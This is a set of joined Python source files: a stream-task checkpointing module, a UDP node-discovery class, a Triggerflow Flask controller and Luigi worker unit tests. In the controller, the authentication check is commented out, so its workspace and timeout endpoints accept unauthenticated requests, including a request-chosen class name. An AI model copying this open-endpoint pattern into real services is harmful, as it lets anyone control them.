elif isinstance(item, CheckpointBarrier):
logger.info("Got barrier:{}".format(item))
logger.info("Start to do checkpoint {}.".format(
item.checkpoint_id))
input_points = item.get_input_checkpoints()
self.do_checkpoint(item.checkpoint_id, input_points)
logger.info("Do checkpoint {} success.".format(
item.checkpoint_id))
else:
raise RuntimeError(
"Unknown item type! item={}".format(item))
except ChannelInterruptException:
logger.info("queue has stopped.")
except BaseException as e:
logger.exception(
"Last success checkpointId={}, now occur error.".format(
self.last_checkpoint_id))
self.request_rollback(str(e))
logger.info("Source fetcher thread exit.")
self.stopped = True
def cancel_task(self):
self.running = False
while not self.stopped:
time.sleep(0.5)
pass
class OneInputStreamTask(InputStreamTask):
"""A stream task for executing :class:`runtime.processor.OneInputProcessor`
"""
def __init__(self, task_id, processor_instance, worker,
last_checkpoint_id):
super().__init__(task_id, processor_instance, worker,
last_checkpoint_id)
class SourceStreamTask(StreamTask):
"""A stream task for executing :class:`runtime.processor.SourceProcessor`
"""
processor: "SourceProcessor"
def __init__(self, task_id: int, processor_instance: "SourceProcessor",
worker: "JobWorker", last_checkpoint_id):
super().__init__(task_id, processor_instance, worker,
last_checkpoint_id)
self.running = True
self.stopped = False
self.__pending_barrier: Optional[Barrier] = None
def run(self):
logger.info("Source task thread start.")
try:
while self.running:
self.processor.fetch()
# check checkpoint
if self.__pending_barrier is not None:
# the source fetcher only has output points
barrier = self.__pending_barrier
logger.info("Start to do checkpoint {}.".format(
barrier.id))
self.do_checkpoint(barrier.id, barrier)
logger.info("Finish to do checkpoint {}.".format(
barrier.id))
self.__pending_barrier = None
except ChannelInterruptException:
logger.info("queue has stopped.")
except Exception as e:
logger.exception(
"Last success checkpointId={}, now occur error.".format(
self.last_checkpoint_id))
self.request_rollback(str(e))
logger.info("Source fetcher thread exit.")
self.stopped = True
def commit_trigger(self, barrier):
if self.__pending_barrier is not None:
logger.warning(
"Last barrier is not broadcast now, skip this barrier trigger."
)
return False
self.__pending_barrier = barrier
return True
def cancel_task(self):
self.running = False
while not self.stopped:
time.sleep(0.5)
pass
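# Illustrative sketch (not part of the original module): the operator-checkpoint
# key built by StreamTask.__gen_op_checkpoint_key is simply
# "<prefix><job_name>_<vertex_name>_<checkpoint_id>". The prefix default below
# is a made-up placeholder; the real value comes from
# Config.JOB_WORKER_OP_CHECKPOINT_PREFIX_KEY.
def _example_op_checkpoint_key(job_name, vertex_name, checkpoint_id,
                               prefix="op_checkpoint_"):  # pragma: no cover
    return prefix + str(job_name) + "_" + str(vertex_name) + "_" + str(checkpoint_id)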
|
node_finder.py
|
import threading, time, socket
class node_finder:
'''
init function
@param self
@param config varaible with config
@return None
'''
def __init__(self, config):
self.config = config
self.sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
# Enable port reuse so multiple clients and servers can run on a single (host, port).
# Do not use socket.SO_REUSEADDR unless you are on Linux with kernel < 3.9; see https://stackoverflow.com/questions/14388706/how-do-so-reuseaddr-and-so-reuseport-differ for more information.
# On Linux, all sockets that want to share the same address and port combination must belong to processes that share the same effective user ID.
# So, on Linux (kernel >= 3.9) you have to run the servers and clients under one user to share the same (host, port).
# Thanks to @stevenreddie
self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEPORT, 1)
# Enable broadcasting mode
self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
self.sock.bind(("", config.finder_port))
# create listener as a new thread
self.listener = threading.Thread(target=self.listener_hello)
# set thread as daemon
self.listener.daemon = True
# start thread
self.listener.start()
# empty list for discovered nodes
self.nodes = []
'''
send find broadcast
@param self
@param retry number of packets to send
@return None
'''
def find_nodes(self, retry = 1):
for trying in range(retry):
self.sock.sendto(self.config.find_packet, ('<broadcast>', self.config.broadcast_port))
# wait 1s to send next
time.sleep(1)
'''
add new node to list
@param self
@param ip of node
@return None
'''
def add_node(self, ip):
if ip not in self.nodes:
self.nodes.append(ip)
'''
listener for hello packets
@param self
@return None
'''
def listener_hello(self):
while True:
data, addr = self.sock.recvfrom(1024)
if data == self.config.hello_packet:
self.add_node(addr[0])
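# Illustrative usage sketch (not part of the original module). The config
# object below is a stand-in: node_finder only needs finder_port, find_packet,
# hello_packet and broadcast_port attributes; the concrete values are made up.
def _example_node_finder():
    import types
    config = types.SimpleNamespace(
        finder_port=50000,
        broadcast_port=50000,
        find_packet=b"FIND",
        hello_packet=b"HELLO",
    )
    finder = node_finder(config)
    finder.find_nodes(retry=3)   # broadcast three find packets, 1 s apart
    time.sleep(1)                # give peers a moment to answer
    return finder.nodes          # IPs of nodes that replied with hello_packet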
|
controller.py
|
import logging
import os
import signal
import yaml
import time
from flask import Flask, jsonify, request
from gevent.pywsgi import WSGIServer
from triggerflow.service import storage
from triggerflow.service.worker import Worker
from triggerflow import eventsources
import threading
app = Flask(__name__)
app.debug = False
workers = {}
monitors = {}
config_map = None
trigger_storage = None
CONFIG_MAP_PATH = 'config_map.yaml'
def authenticate_request(db, auth):
if not auth or 'username' not in auth or 'password' not in auth:
return False
password = db.get_auth(username=auth['username'])
return password and password == auth['password']
@app.before_request
def before_request_func():
pass
# if not authenticate_request(trigger_storage, request.auth):
# return jsonify('Unauthorized'), 401
@app.route('/workspace/<workspace>', methods=['POST'])
def create_worker(workspace):
"""
This method gets the request parameters and starts a new thread worker
    that will act as the event processor for the specific trigger workspace.
    It returns a 400 error if the provided parameters are not correct.
"""
if not trigger_storage.workspace_exists(workspace):
        return jsonify('Workspace {} does not exist in the database'.format(workspace)), 400
if workspace in monitors:
return jsonify('Workspace {} is already created'.format(workspace)), 400
logging.info('New request to create workspace {}'.format(workspace))
start_worker_monitor(workspace)
return jsonify('Created workspace {}'.format(workspace)), 201
def start_worker_monitor(workspace):
"""
    Auxiliary method that monitors a workspace's triggers
"""
global monitors
logging.info('Starting {} workspace monitor'.format(workspace))
def monitor():
if len(trigger_storage.get(workspace, 'triggers')) > 1:
start_worker(workspace)
while True:
if trigger_storage.new_trigger(workspace):
start_worker(workspace)
else:
break
monitors[workspace] = threading.Thread(target=monitor, daemon=True)
monitors[workspace].start()
def start_worker(workspace):
"""
Auxiliary method to start a worker
"""
global workers
if workspace not in workers or not workers[workspace].is_alive():
logging.info('Starting {} workspace'.format(workspace))
workers[workspace] = Worker(workspace, config_map)
workers[workspace].start()
@app.route('/workspace/<workspace>', methods=['DELETE'])
def delete_worker(workspace):
logging.info('New request to delete workspace {}'.format(workspace))
global workers, monitors
if workspace not in monitors and workspace not in workers:
return jsonify('Workspace {} is not active'.format(workspace)), 400
else:
if workspace in workers:
if workers[workspace].is_alive():
workers[workspace].stop_worker()
del workers[workspace]
del monitors[workspace]
return jsonify('Workspace {} deleted'.format(workspace)), 200
@app.route('/workspace/<workspace>/timeout', methods=['POST'])
def timeout(workspace):
    logging.info('New request to add a timeout for workspace {}'.format(workspace))
timeout_data = request.get_json(force=True, silent=True)
if timeout_data is None:
return jsonify('Parameters error'), 400
def _timeout(timeout_data):
logging.debug('Starting event source instance')
logging.debug(timeout_data)
event_source_class = getattr(eventsources, '{}'.format(timeout_data['event_source']['class']))
event_source = event_source_class(**timeout_data['event_source']['parameters'])
time.sleep(timeout_data['seconds'])
timeout_data['event']['type'] = 'event.triggerflow.timeout'
event_source.publish_cloudevent(timeout_data['event'])
        logging.debug('Event {} sent after {} seconds'.format(timeout_data['event'], timeout_data['seconds']))
timeout_thread = threading.Thread(target=_timeout, args=(timeout_data.copy(),))
timeout_thread.start()
logging.debug('Timeout set for workspace {}'.format(workspace))
    return jsonify('Timeout set for workspace {}'.format(workspace)), 201
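# Example JSON body for POST /workspace/<workspace>/timeout (illustrative values;
# only the keys are taken from what the handler above actually reads):
#
#   {
#     "event_source": {
#       "class": "<an event source class name exposed by triggerflow.eventsources>",
#       "parameters": { ... constructor kwargs for that class ... }
#     },
#     "seconds": 60,
#     "event": { "subject": "...", "type": "will be overwritten with event.triggerflow.timeout" }
#   }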
def main():
global config_map, trigger_storage, workers
# Create process group
os.setpgrp()
logger = logging.getLogger()
logger.setLevel(logging.DEBUG)
component = os.getenv('INSTANCE', 'triggerflow-controller')
# Make sure we log to the console
stream_handler = logging.StreamHandler()
formatter = logging.Formatter('[%(asctime)s.%(msecs)03dZ][%(levelname)s][triggerflow] %(message)s',
datefmt="%Y-%m-%dT%H:%M:%S")
stream_handler.setFormatter(formatter)
logger.addHandler(stream_handler)
logging.info('Starting Triggerflow Controller')
# also log to file if /logs is present
if os.path.isdir('/logs'):
fh = logging.FileHandler('/logs/{}_logs.log'.format(component))
fh.setFormatter(formatter)
logger.addHandler(fh)
logging.info('Loading private credentials')
with open(CONFIG_MAP_PATH, 'r') as config_file:
config_map = yaml.safe_load(config_file)
# Instantiate trigger storage client
logging.info('Creating trigger storage client')
backend = config_map['trigger_storage']['backend']
trigger_storage_class = getattr(storage, backend.capitalize() + 'TriggerStorage')
trigger_storage = trigger_storage_class(**config_map['trigger_storage']['parameters'])
port = int(os.getenv('PORT', 5000))
server = WSGIServer(('', port), app, log=logging.getLogger())
logging.info('Triggerflow service started on port {}'.format(port))
workspaces = trigger_storage.list_workspaces()
for wsp in workspaces:
start_worker(wsp)
try:
server.serve_forever()
except KeyboardInterrupt:
print('exiting...')
finally:
# Kill all child processes
os.killpg(0, signal.SIGKILL)
if __name__ == '__main__':
main()
|
worker_test.py
|
# -*- coding: utf-8 -*-
#
# Copyright 2012-2015 Spotify AB
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import print_function
import functools
import logging
import os
import shutil
import signal
import tempfile
import threading
import time
import psutil
from helpers import (unittest, with_config, skipOnTravis, LuigiTestCase,
temporary_unloaded_module)
import luigi.notifications
import luigi.task_register
import luigi.worker
import mock
from luigi import ExternalTask, RemoteScheduler, Task, Event
from luigi.mock import MockTarget, MockFileSystem
from luigi.scheduler import Scheduler
from luigi.worker import Worker
from luigi.rpc import RPCError
from luigi import six
from luigi.cmdline import luigi_run
luigi.notifications.DEBUG = True
class DummyTask(Task):
def __init__(self, *args, **kwargs):
super(DummyTask, self).__init__(*args, **kwargs)
self.has_run = False
def complete(self):
return self.has_run
def run(self):
logging.debug("%s - setting has_run", self)
self.has_run = True
class DynamicDummyTask(Task):
p = luigi.Parameter()
def output(self):
return luigi.LocalTarget(self.p)
def run(self):
with self.output().open('w') as f:
f.write('Done!')
time.sleep(0.5) # so we can benchmark & see if parallelization works
class DynamicDummyTaskWithNamespace(DynamicDummyTask):
task_namespace = 'banana'
class DynamicRequires(Task):
p = luigi.Parameter()
use_banana_task = luigi.BoolParameter(default=False)
def output(self):
return luigi.LocalTarget(os.path.join(self.p, 'parent'))
def run(self):
if self.use_banana_task:
task_cls = DynamicDummyTaskWithNamespace
else:
task_cls = DynamicDummyTask
dummy_targets = yield [task_cls(os.path.join(self.p, str(i)))
for i in range(5)]
dummy_targets += yield [task_cls(os.path.join(self.p, str(i)))
for i in range(5, 7)]
with self.output().open('w') as f:
for i, d in enumerate(dummy_targets):
for line in d.open('r'):
print('%d: %s' % (i, line.strip()), file=f)
class DynamicRequiresOtherModule(Task):
p = luigi.Parameter()
def output(self):
return luigi.LocalTarget(os.path.join(self.p, 'baz'))
def run(self):
import other_module
other_target_foo = yield other_module.OtherModuleTask(os.path.join(self.p, 'foo')) # NOQA
other_target_bar = yield other_module.OtherModuleTask(os.path.join(self.p, 'bar')) # NOQA
with self.output().open('w') as f:
f.write('Done!')
class DummyErrorTask(Task):
retry_index = 0
def run(self):
self.retry_index += 1
raise Exception("Retry index is %s for %s" % (self.retry_index, self.task_family))
class WorkerTest(LuigiTestCase):
def run(self, result=None):
self.sch = Scheduler(retry_delay=100, remove_delay=1000, worker_disconnect_delay=10)
self.time = time.time
with Worker(scheduler=self.sch, worker_id='X') as w, Worker(scheduler=self.sch, worker_id='Y') as w2:
self.w = w
self.w2 = w2
super(WorkerTest, self).run(result)
if time.time != self.time:
time.time = self.time
def setTime(self, t):
time.time = lambda: t
def test_dep(self):
class A(Task):
def run(self):
self.has_run = True
def complete(self):
return self.has_run
a = A()
class B(Task):
def requires(self):
return a
def run(self):
self.has_run = True
def complete(self):
return self.has_run
b = B()
a.has_run = False
b.has_run = False
self.assertTrue(self.w.add(b))
self.assertTrue(self.w.run())
self.assertTrue(a.has_run)
self.assertTrue(b.has_run)
def test_external_dep(self):
class A(ExternalTask):
def complete(self):
return False
a = A()
class B(Task):
def requires(self):
return a
def run(self):
self.has_run = True
def complete(self):
return self.has_run
b = B()
a.has_run = False
b.has_run = False
self.assertTrue(self.w.add(b))
self.assertTrue(self.w.run())
self.assertFalse(a.has_run)
self.assertFalse(b.has_run)
def test_externalized_dep(self):
class A(Task):
has_run = False
def run(self):
self.has_run = True
def complete(self):
return self.has_run
a = A()
class B(A):
def requires(self):
return luigi.task.externalize(a)
b = B()
self.assertTrue(self.w.add(b))
self.assertTrue(self.w.run())
self.assertFalse(a.has_run)
self.assertFalse(b.has_run)
def test_legacy_externalized_dep(self):
class A(Task):
has_run = False
def run(self):
self.has_run = True
def complete(self):
return self.has_run
a = A()
a.run = NotImplemented
class B(A):
def requires(self):
return a
b = B()
self.assertTrue(self.w.add(b))
self.assertTrue(self.w.run())
self.assertFalse(a.has_run)
self.assertFalse(b.has_run)
def test_type_error_in_tracking_run_deprecated(self):
class A(Task):
num_runs = 0
def complete(self):
return False
def run(self, tracking_url_callback=None):
self.num_runs += 1
raise TypeError('bad type')
a = A()
self.assertTrue(self.w.add(a))
self.assertFalse(self.w.run())
# Should only run and fail once, not retry because of the type error
self.assertEqual(1, a.num_runs)
def test_tracking_url(self):
tracking_url = 'http://test_url.com/'
class A(Task):
has_run = False
def complete(self):
return self.has_run
def run(self):
self.set_tracking_url(tracking_url)
self.has_run = True
a = A()
self.assertTrue(self.w.add(a))
self.assertTrue(self.w.run())
tasks = self.sch.task_list('DONE', '')
self.assertEqual(1, len(tasks))
self.assertEqual(tracking_url, tasks[a.task_id]['tracking_url'])
def test_fail(self):
class CustomException(BaseException):
def __init__(self, msg):
self.msg = msg
class A(Task):
def run(self):
self.has_run = True
raise CustomException('bad things')
def complete(self):
return self.has_run
a = A()
class B(Task):
def requires(self):
return a
def run(self):
self.has_run = True
def complete(self):
return self.has_run
b = B()
a.has_run = False
b.has_run = False
self.assertTrue(self.w.add(b))
self.assertFalse(self.w.run())
self.assertTrue(a.has_run)
self.assertFalse(b.has_run)
def test_unknown_dep(self):
# see related test_remove_dep test (grep for it)
class A(ExternalTask):
def complete(self):
return False
class C(Task):
def complete(self):
return True
def get_b(dep):
class B(Task):
def requires(self):
return dep
def run(self):
self.has_run = True
def complete(self):
return False
b = B()
b.has_run = False
return b
b_a = get_b(A())
b_c = get_b(C())
self.assertTrue(self.w.add(b_a))
# So now another worker goes in and schedules C -> B
# This should remove the dep A -> B but will screw up the first worker
self.assertTrue(self.w2.add(b_c))
self.assertFalse(self.w.run()) # should not run anything - the worker should detect that A is broken
self.assertFalse(b_a.has_run)
# not sure what should happen??
# self.w2.run() # should run B since C is fulfilled
# self.assertTrue(b_c.has_run)
def test_unfulfilled_dep(self):
class A(Task):
def complete(self):
return self.done
def run(self):
self.done = True
def get_b(a):
class B(A):
def requires(self):
return a
b = B()
b.done = False
a.done = True
return b
a = A()
b = get_b(a)
self.assertTrue(self.w.add(b))
a.done = False
self.w.run()
self.assertTrue(a.complete())
self.assertTrue(b.complete())
def test_gets_missed_work(self):
class A(Task):
done = False
def complete(self):
return self.done
def run(self):
self.done = True
a = A()
self.assertTrue(self.w.add(a))
# simulate a missed get_work response
self.assertEqual(a.task_id, self.sch.get_work(worker='X')['task_id'])
self.assertTrue(self.w.run())
self.assertTrue(a.complete())
def test_avoid_infinite_reschedule(self):
class A(Task):
def complete(self):
return False
class B(Task):
def complete(self):
return False
def requires(self):
return A()
self.assertTrue(self.w.add(B()))
self.assertFalse(self.w.run())
def test_fails_registering_signal(self):
with mock.patch('luigi.worker.signal', spec=['signal']):
# mock will raise an attribute error getting signal.SIGUSR1
Worker()
def test_allow_reschedule_with_many_missing_deps(self):
class A(Task):
""" Task that must run twice to succeed """
i = luigi.IntParameter()
runs = 0
def complete(self):
return self.runs >= 2
def run(self):
self.runs += 1
class B(Task):
done = False
def requires(self):
return map(A, range(20))
def complete(self):
return self.done
def run(self):
self.done = True
b = B()
w = Worker(scheduler=self.sch, worker_id='X', max_reschedules=1)
self.assertTrue(w.add(b))
self.assertFalse(w.run())
# For b to be done, we must have rescheduled its dependencies to run them twice
self.assertTrue(b.complete())
self.assertTrue(all(a.complete() for a in b.deps()))
def test_interleaved_workers(self):
class A(DummyTask):
pass
a = A()
class B(DummyTask):
def requires(self):
return a
ExternalB = luigi.task.externalize(B)
b = B()
eb = ExternalB()
self.assertEqual(str(eb), "B()")
sch = Scheduler(retry_delay=100, remove_delay=1000, worker_disconnect_delay=10)
with Worker(scheduler=sch, worker_id='X') as w, Worker(scheduler=sch, worker_id='Y') as w2:
self.assertTrue(w.add(b))
self.assertTrue(w2.add(eb))
logging.debug("RUNNING BROKEN WORKER")
self.assertTrue(w2.run())
self.assertFalse(a.complete())
self.assertFalse(b.complete())
logging.debug("RUNNING FUNCTIONAL WORKER")
self.assertTrue(w.run())
self.assertTrue(a.complete())
self.assertTrue(b.complete())
def test_interleaved_workers2(self):
# two tasks without dependencies, one external, one not
class B(DummyTask):
pass
ExternalB = luigi.task.externalize(B)
b = B()
eb = ExternalB()
self.assertEqual(str(eb), "B()")
sch = Scheduler(retry_delay=100, remove_delay=1000, worker_disconnect_delay=10)
with Worker(scheduler=sch, worker_id='X') as w, Worker(scheduler=sch, worker_id='Y') as w2:
self.assertTrue(w2.add(eb))
self.assertTrue(w.add(b))
self.assertTrue(w2.run())
self.assertFalse(b.complete())
self.assertTrue(w.run())
self.assertTrue(b.complete())
def test_interleaved_workers3(self):
class A(DummyTask):
def run(self):
logging.debug('running A')
time.sleep(0.1)
super(A, self).run()
a = A()
class B(DummyTask):
def requires(self):
return a
def run(self):
logging.debug('running B')
super(B, self).run()
b = B()
sch = Scheduler(retry_delay=100, remove_delay=1000, worker_disconnect_delay=10)
with Worker(scheduler=sch, worker_id='X', keep_alive=True, count_uniques=True) as w:
with Worker(scheduler=sch, worker_id='Y', keep_alive=True, count_uniques=True, wait_interval=0.1, wait_jitter=0.05) as w2:
self.assertTrue(w.add(a))
self.assertTrue(w2.add(b))
threading.Thread(target=w.run).start()
self.assertTrue(w2.run())
self.assertTrue(a.complete())
self.assertTrue(b.complete())
def test_die_for_non_unique_pending(self):
class A(DummyTask):
def run(self):
logging.debug('running A')
time.sleep(0.1)
super(A, self).run()
a = A()
class B(DummyTask):
def requires(self):
return a
def run(self):
logging.debug('running B')
super(B, self).run()
b = B()
sch = Scheduler(retry_delay=100, remove_delay=1000, worker_disconnect_delay=10)
with Worker(scheduler=sch, worker_id='X', keep_alive=True, count_uniques=True) as w:
with Worker(scheduler=sch, worker_id='Y', keep_alive=True, count_uniques=True, wait_interval=0.1, wait_jitter=0.05) as w2:
self.assertTrue(w.add(b))
self.assertTrue(w2.add(b))
self.assertEqual(w._get_work()[0], a.task_id)
self.assertTrue(w2.run())
self.assertFalse(a.complete())
self.assertFalse(b.complete())
def test_complete_exception(self):
"Tests that a task is still scheduled if its sister task crashes in the complete() method"
class A(DummyTask):
def complete(self):
raise Exception("doh")
a = A()
class C(DummyTask):
pass
c = C()
class B(DummyTask):
def requires(self):
return a, c
b = B()
sch = Scheduler(retry_delay=100, remove_delay=1000, worker_disconnect_delay=10)
with Worker(scheduler=sch, worker_id="foo") as w:
self.assertFalse(w.add(b))
self.assertTrue(w.run())
self.assertFalse(b.has_run)
self.assertTrue(c.has_run)
self.assertFalse(a.has_run)
def test_requires_exception(self):
class A(DummyTask):
def requires(self):
raise Exception("doh")
a = A()
class D(DummyTask):
pass
d = D()
class C(DummyTask):
def requires(self):
return d
c = C()
class B(DummyTask):
def requires(self):
return c, a
b = B()
sch = Scheduler(retry_delay=100, remove_delay=1000, worker_disconnect_delay=10)
with Worker(scheduler=sch, worker_id="foo") as w:
self.assertFalse(w.add(b))
self.assertTrue(w.run())
self.assertFalse(b.has_run)
self.assertTrue(c.has_run)
self.assertTrue(d.has_run)
self.assertFalse(a.has_run)
def test_run_csv_batch_job(self):
completed = set()
class CsvBatchJob(luigi.Task):
values = luigi.parameter.Parameter(batch_method=','.join)
has_run = False
def run(self):
completed.update(self.values.split(','))
self.has_run = True
def complete(self):
return all(value in completed for value in self.values.split(','))
tasks = [CsvBatchJob(str(i)) for i in range(10)]
for task in tasks:
self.assertTrue(self.w.add(task))
self.assertTrue(self.w.run())
for task in tasks:
self.assertTrue(task.complete())
self.assertFalse(task.has_run)
def test_run_max_batch_job(self):
completed = set()
class MaxBatchJob(luigi.Task):
value = luigi.IntParameter(batch_method=max)
has_run = False
def run(self):
completed.add(self.value)
self.has_run = True
def complete(self):
return any(self.value <= ran for ran in completed)
tasks = [MaxBatchJob(i) for i in range(10)]
for task in tasks:
self.assertTrue(self.w.add(task))
self.assertTrue(self.w.run())
for task in tasks:
self.assertTrue(task.complete())
# only task number 9 should run
self.assertFalse(task.has_run and task.value < 9)
def test_run_batch_job_unbatched(self):
completed = set()
class MaxNonBatchJob(luigi.Task):
value = luigi.IntParameter(batch_method=max)
has_run = False
batchable = False
def run(self):
completed.add(self.value)
self.has_run = True
def complete(self):
return self.value in completed
tasks = [MaxNonBatchJob((i,)) for i in range(10)]
for task in tasks:
self.assertTrue(self.w.add(task))
self.assertTrue(self.w.run())
for task in tasks:
self.assertTrue(task.complete())
self.assertTrue(task.has_run)
def test_run_batch_job_limit_batch_size(self):
completed = set()
runs = []
class CsvLimitedBatchJob(luigi.Task):
value = luigi.parameter.Parameter(batch_method=','.join)
has_run = False
max_batch_size = 4
def run(self):
completed.update(self.value.split(','))
runs.append(self)
def complete(self):
return all(value in completed for value in self.value.split(','))
tasks = [CsvLimitedBatchJob(str(i)) for i in range(11)]
for task in tasks:
self.assertTrue(self.w.add(task))
self.assertTrue(self.w.run())
for task in tasks:
self.assertTrue(task.complete())
self.assertEqual(3, len(runs))
def test_fail_max_batch_job(self):
class MaxBatchFailJob(luigi.Task):
value = luigi.IntParameter(batch_method=max)
has_run = False
def run(self):
self.has_run = True
assert False
def complete(self):
return False
tasks = [MaxBatchFailJob(i) for i in range(10)]
for task in tasks:
self.assertTrue(self.w.add(task))
self.assertFalse(self.w.run())
for task in tasks:
# only task number 9 should run
self.assertFalse(task.has_run and task.value < 9)
self.assertEqual({task.task_id for task in tasks}, set(self.sch.task_list('FAILED', '')))
def test_gracefully_handle_batch_method_failure(self):
class BadBatchMethodTask(DummyTask):
priority = 10
batch_int_param = luigi.IntParameter(batch_method=int.__add__) # should be sum
bad_tasks = [BadBatchMethodTask(i) for i in range(5)]
good_tasks = [DummyTask()]
all_tasks = good_tasks + bad_tasks
self.assertFalse(any(task.complete() for task in all_tasks))
worker = Worker(scheduler=Scheduler(retry_count=1), keep_alive=True)
for task in all_tasks:
self.assertTrue(worker.add(task))
self.assertFalse(worker.run())
self.assertFalse(any(task.complete() for task in bad_tasks))
# we only get to run the good task if the bad task failures were handled gracefully
self.assertTrue(all(task.complete() for task in good_tasks))
def test_post_error_message_for_failed_batch_methods(self):
class BadBatchMethodTask(DummyTask):
batch_int_param = luigi.IntParameter(batch_method=int.__add__) # should be sum
tasks = [BadBatchMethodTask(1), BadBatchMethodTask(2)]
for task in tasks:
self.assertTrue(self.w.add(task))
self.assertFalse(self.w.run())
failed_ids = set(self.sch.task_list('FAILED', ''))
self.assertEqual({task.task_id for task in tasks}, failed_ids)
self.assertTrue(all(self.sch.fetch_error(task_id)['error'] for task_id in failed_ids))
class WorkerKeepAliveTests(LuigiTestCase):
def setUp(self):
self.sch = Scheduler()
super(WorkerKeepAliveTests, self).setUp()
def _worker_keep_alive_test(self, first_should_live, second_should_live, task_status=None, **worker_args):
worker_args.update({
'scheduler': self.sch,
'worker_processes': 0,
'wait_interval': 0.01,
'wait_jitter': 0.0,
})
w1 = Worker(worker_id='w1', **worker_args)
w2 = Worker(worker_id='w2', **worker_args)
with w1 as worker1, w2 as worker2:
worker1.add(DummyTask())
t1 = threading.Thread(target=worker1.run)
t1.start()
worker2.add(DummyTask())
t2 = threading.Thread(target=worker2.run)
t2.start()
if task_status:
self.sch.add_task(worker='DummyWorker', task_id=DummyTask().task_id, status=task_status)
# allow workers to run their get work loops a few times
time.sleep(0.1)
try:
self.assertEqual(first_should_live, t1.isAlive())
self.assertEqual(second_should_live, t2.isAlive())
finally:
# mark the task done so the worker threads will die
self.sch.add_task(worker='DummyWorker', task_id=DummyTask().task_id, status='DONE')
t1.join()
t2.join()
def test_no_keep_alive(self):
self._worker_keep_alive_test(
first_should_live=False,
second_should_live=False,
)
def test_keep_alive(self):
self._worker_keep_alive_test(
first_should_live=True,
second_should_live=True,
keep_alive=True,
)
def test_keep_alive_count_uniques(self):
self._worker_keep_alive_test(
first_should_live=False,
second_should_live=False,
keep_alive=True,
count_uniques=True,
)
def test_keep_alive_count_last_scheduled(self):
self._worker_keep_alive_test(
first_should_live=False,
second_should_live=True,
keep_alive=True,
count_last_scheduled=True,
)
def test_keep_alive_through_failure(self):
self._worker_keep_alive_test(
first_should_live=True,
second_should_live=True,
keep_alive=True,
task_status='FAILED',
)
def test_do_not_keep_alive_through_disable(self):
self._worker_keep_alive_test(
first_should_live=False,
second_should_live=False,
keep_alive=True,
task_status='DISABLED',
)
class WorkerInterruptedTest(unittest.TestCase):
def setUp(self):
self.sch = Scheduler(retry_delay=100, remove_delay=1000, worker_disconnect_delay=10)
requiring_sigusr = unittest.skipUnless(hasattr(signal, 'SIGUSR1'),
'signal.SIGUSR1 not found on this system')
def _test_stop_getting_new_work(self, worker):
d = DummyTask()
with worker:
worker.add(d) # For assistant its ok that other tasks add it
self.assertFalse(d.complete())
worker.handle_interrupt(signal.SIGUSR1, None)
worker.run()
self.assertFalse(d.complete())
@requiring_sigusr
def test_stop_getting_new_work(self):
self._test_stop_getting_new_work(
Worker(scheduler=self.sch))
@requiring_sigusr
def test_stop_getting_new_work_assistant(self):
self._test_stop_getting_new_work(
Worker(scheduler=self.sch, keep_alive=False, assistant=True))
@requiring_sigusr
def test_stop_getting_new_work_assistant_keep_alive(self):
self._test_stop_getting_new_work(
Worker(scheduler=self.sch, keep_alive=True, assistant=True))
def test_existence_of_disabling_option(self):
# any code equivalent of `os.kill(os.getpid(), signal.SIGUSR1)`
        # seems to give some sort of an "InvocationError"
Worker(no_install_shutdown_handler=True)
@with_config({"worker": {"no_install_shutdown_handler": "True"}})
def test_can_run_luigi_in_thread(self):
class A(DummyTask):
pass
task = A()
# Note that ``signal.signal(signal.SIGUSR1, fn)`` can only be called in the main thread.
# So if we do not disable the shutdown handler, this would fail.
t = threading.Thread(target=lambda: luigi.build([task], local_scheduler=True))
t.start()
t.join()
self.assertTrue(task.complete())
class WorkerDisabledTest(LuigiTestCase):
def make_sch(self):
return Scheduler(retry_delay=100, remove_delay=1000, worker_disconnect_delay=10)
def _test_stop_getting_new_work_build(self, sch, worker):
"""
I got motivated to create this test case when I saw that the
        execution_summary crashed after my first attempted solution.
"""
class KillWorkerTask(luigi.Task):
did_actually_run = False
def run(self):
sch.disable_worker('my_worker_id')
KillWorkerTask.did_actually_run = True
class Factory(object):
def create_local_scheduler(self, *args, **kwargs):
return sch
def create_worker(self, *args, **kwargs):
return worker
luigi.build([KillWorkerTask()], worker_scheduler_factory=Factory(), local_scheduler=True)
self.assertTrue(KillWorkerTask.did_actually_run)
def _test_stop_getting_new_work_manual(self, sch, worker):
d = DummyTask()
with worker:
worker.add(d) # For assistant its ok that other tasks add it
self.assertFalse(d.complete())
sch.disable_worker('my_worker_id')
worker.run() # Note: Test could fail by hanging on this line
self.assertFalse(d.complete())
def _test_stop_getting_new_work(self, **worker_kwargs):
worker_kwargs['worker_id'] = 'my_worker_id'
sch = self.make_sch()
worker_kwargs['scheduler'] = sch
self._test_stop_getting_new_work_manual(sch, Worker(**worker_kwargs))
sch = self.make_sch()
worker_kwargs['scheduler'] = sch
self._test_stop_getting_new_work_build(sch, Worker(**worker_kwargs))
def test_stop_getting_new_work_keep_alive(self):
self._test_stop_getting_new_work(keep_alive=True, assistant=False)
def test_stop_getting_new_work_assistant(self):
self._test_stop_getting_new_work(keep_alive=False, assistant=True)
def test_stop_getting_new_work_assistant_keep_alive(self):
self._test_stop_getting_new_work(keep_alive=True, assistant=True)
class DynamicDependenciesTest(unittest.TestCase):
n_workers = 1
timeout = float('inf')
def setUp(self):
self.p = tempfile.mkdtemp()
def tearDown(self):
shutil.rmtree(self.p)
def test_dynamic_dependencies(self, use_banana_task=False):
t0 = time.time()
t = DynamicRequires(p=self.p, use_banana_task=use_banana_task)
luigi.build([t], local_scheduler=True, workers=self.n_workers)
self.assertTrue(t.complete())
# loop through output and verify
with t.output().open('r') as f:
for i in range(7):
self.assertEqual(f.readline().strip(), '%d: Done!' % i)
self.assertTrue(time.time() - t0 < self.timeout)
def test_dynamic_dependencies_with_namespace(self):
self.test_dynamic_dependencies(use_banana_task=True)
def test_dynamic_dependencies_other_module(self):
t = DynamicRequiresOtherModule(p=self.p)
luigi.build([t], local_scheduler=True, workers=self.n_workers)
self.assertTrue(t.complete())
class DynamicDependenciesWithMultipleWorkersTest(DynamicDependenciesTest):
n_workers = 100
